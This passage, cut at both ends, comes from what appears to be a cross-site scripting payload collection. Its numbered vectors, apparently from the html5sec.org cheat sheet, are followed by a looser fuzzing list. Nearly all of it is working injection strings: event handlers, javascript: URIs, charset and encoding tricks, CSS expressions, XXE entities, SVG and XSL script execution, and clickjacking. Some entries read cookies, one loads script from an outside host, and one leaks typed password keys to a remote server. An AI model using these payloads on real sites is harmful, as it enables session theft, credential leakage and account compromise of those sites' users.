formaction=\"javascript:alert(1)\">X</button>//[\"'`-->]]>]</div><div id=\"2\"><meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//[\"'`-->]]>]</div><div id=\"3\"><meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//[\"'`-->]]>]</div><div id=\"4\">0?<script>Worker(\"#\").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//[\"'`-->]]>]</div><div id=\"5\"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//[\"'`-->]]>]</div><div id=\"6\"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//[\"'`-->]]>]</div><div id=\"7\"><input onfocus=alert(7) autofocus>//[\"'`-->]]>]</div><div id=\"8\"><input onblur=alert(8) autofocus><input autofocus>//[\"'`-->]]>]</div><div id=\"9\"><a style=\"-o-link:'javascript:alert(9)';-o-link-source:current\">X</a>//[\"'`-->]]>]</div><div id=\"10\"><video poster=javascript:alert(10)//></video>//[\"'`-->]]>]</div><div id=\"11\"><svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(11)\"></g></svg>//[\"'`-->]]>]</div><div id=\"12\"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//[\"'`-->]]>]</div><div id=\"13\"><x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>//[\"'`-->]]>]</div><div id=\"14\"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//[\"'`-->]]>]</div><div id=\"15\"><script>({0:#0=alert/#0#/#0#(0)})</script>//[\"'`-->]]>]</div><div id=\"16\">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//[\"'`-->]]>]</div><div id=\"17\"><?xml-stylesheet href=\"javascript:alert(17)\"?><root/>//[\"'`-->]]>]</div><div id=\"18\"><script xmlns=\"http://www.w3.org/1999/xhtml\">&#x61;l&#x65;rt&#40;1)</script>//[\"'`-->]]>]</div><div id=\"19\"><meta charset=\"x-mac-farsi\">¼script ¾alert(19)//¼/script ¾//[\"'`-->]]>]</div><div id=\"20\"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//[\"'`-->]]>]</div><div id=\"21\"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//[\"'`-->]]>]</div><div id=\"22\"><input onblur=focus() autofocus><input>//[\"'`-->]]>]</div><div id=\"23\"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//[\"'`-->]]>]</div><div id=\"24\">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//[\"'`-->]]>]</div><div id=\"25\"><script src=\"#\">{alert(25)}</script>;1//[\"'`-->]]>]</div><div id=\"26\">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//[\"'`-->]]>]</div><div id=\"27\"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//[\"'`-->]]>]</div>\n<div id=\"28\">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//[\"'`-->]]>]</div>\n<div id=\"29\"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//[\"'`-->]]>]</div><div id=\"30\"><style>@import \"data:,*%7bx:expression(alert(30))%7D\";</style>//[\"'`-->]]>]</div><div id=\"31\"><frameset onload=alert(31)>//[\"'`-->]]>]</div><div id=\"32\"><table background=\"javascript:alert(32)\"></table>//[\"'`-->]]>]</div><div id=\"33\"><a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(33);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>//[\"'`-->]]>]</div><div id=\"34\">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//[\"'`-->]]>]</div><div id=\"35\">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//[\"'`-->]]>]</div><div id=\"36\"><a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(36)\">XXX</a>//[\"'`-->]]>]</div><div id=\"37\"><!--<img src=\"--><img src=x onerror=alert(37)//\">//[\"'`-->]]>]</div><div id=\"38\"><comment><img src=\"</comment><img src=x onerror=alert(38)//\">//[\"'`-->]]>]</div>\n<div id=\"39\"><!-- up to Opera 11.52, FF 3.6.28 -->\n<![><img src=\"]><img src=x onerror=alert(39)//\">\n\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  -->\n<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>//[\"'`-->]]>]</div>\n<div id=\"40\"><style><img src=\"</style><img src=x onerror=alert(40)//\">//[\"'`-->]]>]</div>\n<div id=\"41\"><li style=list-style:url() onerror=alert(41)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//[\"'`-->]]>]</div>\n<div id=\"42\"><head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(42)//#\">XXX</a></body>//[\"'`-->]]>]</div>\n<div id=\"43\"><?xml version=\"1.0\" standalone=\"no\"?>\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<style type=\"text/css\">\n@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}\n</style>\n</head>\n<body>Hello</body>\n</html>//[\"'`-->]]>]</div>\n<div id=\"44\"><style>*[{}@import'test.css?]{color: green;}</style>X//[\"'`-->]]>]</div><div id=\"45\"><div style=\"font-family:'foo[a];color:red;';\">XXX</div>//[\"'`-->]]>]</div><div id=\"46\"><div style=\"font-family:foo}color=red;\">XXX</div>//[\"'`-->]]>]</div><div id=\"47\"><svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(47)</script></svg>//[\"'`-->]]>]</div><div id=\"48\"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//[\"'`-->]]>]</div><div id=\"49\"><OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(49)\"></OBJECT>//[\"'`-->]]>]</div><div id=\"50\"><object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>//[\"'`-->]]>]</div><div id=\"51\"><embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>//[\"'`-->]]>]</div><div id=\"52\"><x style=\"behavior:url(test.sct)\">//[\"'`-->]]>]</div>\n<div id=\"53\"><xml id=\"xss\" src=\"test.htc\"></xml>\n<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>//[\"'`-->]]>]</div>\n<div id=\"54\"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//[\"'`-->]]>]</div><div id=\"55\"><video><source onerror=\"alert(55)\">//[\"'`-->]]>]</div><div id=\"56\"><video onerror=\"alert(56)\"><source></source></video>//[\"'`-->]]>]</div><div id=\"57\"><b <script>alert(57)//</script>0</script></b>//[\"'`-->]]>]</div><div id=\"58\"><b><script<b></b><alert(58)</script </b></b>//[\"'`-->]]>]</div><div id=\"59\"><div id=\"div1\"><input value=\"``onmouseover=alert(59)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>//[\"'`-->]]>]</div><div id=\"60\"><div style=\"[a]color[b]:[c]red\">XXX</div>//[\"'`-->]]>]</div>\n<div id=\"61\"><div  style=\"\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;\">XXX</div>//[\"'`-->]]>]</div>\n\n<div id=\"62\"><!-- IE 6-8 -->\n<x '=\"foo\"><x foo='><img src=x onerror=alert(62)//'>\n\n<!-- IE 6-9 -->\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>//[\"'`-->]]>]</div>\n\n<div id=\"63\"><embed src=\"javascript:alert(63)\"></embed> // O10.10↓, OM10.0↓, GC6↓, FF\n<img src=\"javascript:alert(2)\">\n<image src=\"javascript:alert(2)\"> // IE6, O10.10↓, OM10.0↓\n<script src=\"javascript:alert(3)\"></script> // IE6, O11.01↓, OM10.1↓//[\"'`-->]]>]</div>\n<div id=\"64\"><!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>//[\"'`-->]]>]</div><div id=\"65\"><svg onload=\"javascript:alert(65)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>//[\"'`-->]]>]</div>\n<div id=\"66\"><?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>//[\"'`-->]]>]</div>\n\n<div id=\"67\"><!DOCTYPE x [\n    <!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"\n onerror CDATA \"alert(67)\"\n onload CDATA \"alert(2)\">\n]><img />//[\"'`-->]]>]</div>\n\n<div id=\"68\"><doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\n    <html:style /><x xlink:href=\"javascript:alert(68)\" xlink:type=\"simple\">XXX</x>\n</doc>//[\"'`-->]]>]</div>\n<div id=\"69\"><card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(69)\"/></onevent><timer value=\"1\"/></card>//[\"'`-->]]>]</div><div id=\"70\"><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//[\"'`-->]]>]</div><div id=\"71\"><// style=x:expression\\28alert(71)\\29>//[\"'`-->]]>]</div><div id=\"72\"><form><button formaction=\"javascript:alert(72)\">X</button>//[\"'`-->]]>]</div><div id=\"73\"><event-source src=\"event.php\" onload=\"alert(73)\">//[\"'`-->]]>]</div><div id=\"74\"><a href=\"javascript:alert(74)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>//[\"'`-->]]>]</div><div id=\"75\"><script<{alert(75)}/></script </>//[\"'`-->]]>]</div><div id=\"76\"><?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>//[\"'`-->]]>]</div><div id=\"77\"><?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(alert(77))\"/>//[\"'`-->]]>]</div><div id=\"78\"><?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>//[\"'`-->]]>]</div><div id=\"79\"><object allowscriptaccess=\"always\" data=\"test.swf\"></object>//[\"'`-->]]>]</div><div id=\"80\"><style>*{x:ｅｘｐｒｅｓｓｉｏｎ(alert(80))}</style>//[\"'`-->]]>]</div><div id=\"81\"><x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(81)\" xlink:type=\"simple\"/>//[\"'`-->]]>]</div><div id=\"82\"><?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>//[\"'`-->]]>]</div>\n<div id=\"83\"><x:template xmlns:x=\"http://www.wapforum.org/2001/wml\"  x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)\"><x:timer value=\"1\"/></x:template>//[\"'`-->]]>]</div>\n<div id=\"84\"><x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(84)//#x\"/>//[\"'`-->]]>]</div><div id=\"85\"><x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>//[\"'`-->]]>]</div><div id=\"86\"><body oninput=alert(86)><input autofocus>//[\"'`-->]]>]</div>\n<div id=\"87\"><svg xmlns=\"http://www.w3.org/2000/svg\">\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(87)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a>\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"88\"><svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n\n<animation xlink:href=\"javascript:alert(88)\"/>\n<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E\"/>\n\n<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E\"/>\n\n<foreignObject xlink:href=\"javascript:alert(88)\"/>\n<foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E\"/>\n\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"89\"><svg xmlns=\"http://www.w3.org/2000/svg\">\n<set attributeName=\"onmouseover\" to=\"alert(89)\"/>\n<animate attributeName=\"onunload\" to=\"alert(89)\"/>\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"90\"><!-- Up to Opera 10.63 -->\n<div style=content:url(test2.svg)></div>\n\n<!-- Up to Opera 11.64 - see link below -->\n\n<!-- Up to Opera 12.x -->\n<div style=\"background:url(test5.svg)\">PRESS ENTER</div>//[\"'`-->]]>]</div>\n\n<div id=\"91\">[A]\n<? foo=\"><script>alert(91)</script>\">\n<! foo=\"><script>alert(91)</script>\">\n</ foo=\"><script>alert(91)</script>\">\n[B]\n<? foo=\"><x foo='?><script>alert(91)</script>'>\">\n[C]\n<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(91)</script>\">\n[D]\n<% foo><x foo=\"%><script>alert(91)</script>\">//[\"'`-->]]>]</div>\n<div id=\"92\"><div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>//[\"'`-->]]>]</div><div id=\"93\"><div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(93));\">X</div>//[\"'`-->]]>]</div>\n<div id=\"94\"><svg xmlns=\"http://www.w3.org/2000/svg\">\n<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(94)</handler>\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"95\"><svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<feImage>\n<set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>\n</feImage>\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"96\"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//[\"'`-->]]>]</div>\n\n<div id=\"97\"><!-- IE 5-9 -->\n<div id=d><x xmlns=\"><iframe onload=alert(97)\"></div>\n<script>d.innerHTML+='';</script>\n\n<!-- IE 10 in IE5-9 Standards mode -->\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>//[\"'`-->]]>]</div>\n\n<div id=\"98\"><div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>\n<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>//[\"'`-->]]>]</div>\n\n<div id=\"99\">XXX<style>\n\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\n\n<!--\n--><!--*{color:red}   /* all UA */\n\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\n\n</style>//[\"'`-->]]>]</div>\n<div id=\"100\"><img[a][b]src=x[d]onerror[c]=[e]\"alert(100)\">//[\"'`-->]]>]</div><div id=\"101\"><a href=\"[a]java[b]script[c]:alert(101)\">XXX</a>//[\"'`-->]]>]</div><div id=\"102\"><img src=\"x` `<script>alert(102)</script>\"` `>//[\"'`-->]]>]</div><div id=\"103\"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//[\"'`-->]]>]</div>\n<div id=\"104\"><svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">\n<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>\n</svg>//[\"'`-->]]>]</div>\n<div id=\"105\"><iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>//[\"'`-->]]>]</div><div id=\"106\"><img src onerror /\" '\"= alt=alert(106)//\">//[\"'`-->]]>]</div><div id=\"107\"><title onpropertychange=alert(107)></title><title title=></title>//[\"'`-->]]>]</div>\n<div id=\"108\"><!-- IE 5-8 standards mode -->\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(108)></a>\">\n\n<!-- IE 5-9 standards mode -->\n<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">\n<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">//[\"'`-->]]>]</div>\n\n<div id=\"109\"><svg xmlns=\"http://www.w3.org/2000/svg\">\n<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>\n<rect  fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"110\"><svg xmlns=\"http://www.w3.org/2000/svg\">\n<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>\n</svg>//[\"'`-->]]>]</div>\n<div id=\"111\"><div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>//[\"'`-->]]>]</div><div id=\"112\"><div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>//[\"'`-->]]>]</div>\n<div id=\"113\"><div id=\"x\">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>//[\"'`-->]]>]</div>\n<div id=\"114\"><x style=\"background:url('x[a];color:red;/*')\">XXX</x>//[\"'`-->]]>]</div>\n<div id=\"115\"><!--[if]><script>alert(115)</script -->\n<!--[if<img src=x onerror=alert(2)//]> -->//[\"'`-->]]>]</div>\n\n<div id=\"116\"><div id=\"x\">x</div>\n<xml:namespace prefix=\"t\">\n<import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;\">//[\"'`-->]]>]</div>\n\n<div id=\"117\"><a href=\"http://attacker.org\">\n    <iframe src=\"http://example.org/\"></iframe>\n</a>//[\"'`-->]]>]</div>\n\n<div id=\"118\"><div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\n    <h1>Drop me</h1>\n</div>\n\n<iframe src=\"http://www.example.org/dropHere.html\"></iframe>//[\"'`-->]]>]</div>\n\n<div id=\"119\"><iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>//[\"'`-->]]>]</div>\n\n<div id=\"120\"><script>\nfunction makePopups(){\n    for (i=1;i<6;i++) {\n        window.open('popup.html','spam'+i,'width=50,height=50');\n    }\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>//[\"'`-->]]>]</div>\n\n<div id=\"121\"><html xmlns=\"http://www.w3.org/1999/xhtml\"\nxmlns:svg=\"http://www.w3.org/2000/svg\">\n<body style=\"background:gray\">\n<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n    <svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n    <svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>//[\"'`-->]]>]</div>\n<div id=\"122\"><iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>//[\"'`-->]]>]</div>\n<div id=\"123\"><span class=foo>Some text</span>\n<a class=bar href=\"http://www.example.org\">www.example.org</a>\n\n<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>\n<script>\n$(\"span.foo\").click(function() {\nalert('foo');\n$(\"a.bar\").click();\n});\n$(\"a.bar\").click(function() {\nalert('bar');\nlocation=\"http://html5sec.org\";\n});\n</script>//[\"'`-->]]>]</div>\n\n<div id=\"124\"><script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10\n<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0//[\"'`-->]]>]</div>\n\n<div id=\"125\"><?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\n<!DOCTYPE doc [\n<!ATTLIST xsl:stylesheet\n  id    ID    #REQUIRED>]>\n<svg xmlns=\"http://www.w3.org/2000/svg\">\n    <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n        <xsl:template match=\"/\">\n            <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(125)\"></iframe>\n        </xsl:template>\n    </xsl:stylesheet>\n    <circle fill=\"red\" r=\"40\"></circle>\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"126\"><object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>\n<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(126)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>//[\"'`-->]]>]</div>\n\n<div id=\"127\"><svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">\n<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>\n<handler id=\"y\">alert(127)</handler>\n</svg>//[\"'`-->]]>]</div>\n<div id=\"128\"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//[\"'`-->]]>]</div>\n<div id=\"129\"><svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>//[\"'`-->]]>]</div>\n\n<div id=\"130\"><math href=\"javascript:alert(130)\">CLICKME</math>\n\n<math>\n<!-- up to FF 13 -->\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\n\n<!-- FF 14+ -->\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math>//[\"'`-->]]>]</div>\n\n<div id=\"131\"><b>drag and drop one of the following strings to the drop box:</b>\n<br/><hr/>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br/><hr/>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br/><hr/>\nfeed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b>\n<br/><hr/>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br/><hr/>\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>//[\"'`-->]]>]</div>\n\n<div id=\"132\"><!doctype html>\n<form>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n<input name=\"secret\" type=\"password\">\n</form>\n<!-- injection --><svg height=\"50px\">\n<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />\n<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />\n<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />\n<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />\n</image>\n</svg>//[\"'`-->]]>]</div>\n<div id=\"133\"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//[\"'`-->]]>]</div>\n<div id=\"134\"><xmp>\n<%\n</xmp>\n<img alt='%></xmp><img src=xx:x onerror=alert(134)//'>\n\n<script>\nx='<%'\n</script> %>/\nalert(2)\n</script>\n\nXXX\n<style>\n*['<!--']{}\n</style>\n-->{}\n*{color:red}</style>//[\"'`-->]]>]</div>\n\n<div id=\"135\"><?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>\n<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">\n<template match=\"/\">\n<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>\n<if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>\n</template>\n</stylesheet>//[\"'`-->]]>]</div>\n\n<div id=\"136\"><form action=\"\" method=\"post\">\n<input name=\"username\" value=\"admin\" />\n<input name=\"password\" type=\"password\" value=\"secret\" />\n<input name=\"injected\" value=\"injected\" dirname=\"password\" />\n<input type=\"submit\">\n</form>//[\"'`-->]]>]</div>\n\n<div id=\"137\"><svg>\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"?\">\n<circle r=\"400\"></circle>\n<animate attributeName=\"xlink:href\" begin=\"0\" from=\"javascript:alert(137)\" to=\"&\" />\n</a>//[\"'`-->]]>]</div>\n'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E\n<<scr\\0ipt/src=http://xss.com/xss.js></script\n%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E\n' onmouseover=alert(/Black.Spook/)\n\"><iframe%20src=\"http://google.com\"%%203E\n'<script>window.onload=function(){document.forms[0].message.value='1';}</script>\nx”</title><img src%3dx onerror%3dalert(1)>\n<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>\n<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>\n<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>\n<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>\n<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<script>xhr=new 